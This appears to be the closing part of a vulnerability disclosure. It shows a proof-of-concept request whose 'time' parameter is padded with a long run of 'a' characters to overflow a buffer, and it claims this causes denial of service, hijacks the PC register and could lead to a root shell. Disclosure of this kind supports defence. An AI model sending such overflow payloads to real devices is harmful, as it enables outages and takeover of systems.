    time=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-bbb
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

As shown in the figure above, we can hijack PC registers.

Finally, you also can write exp to get a stable root shell.

Tag

#dos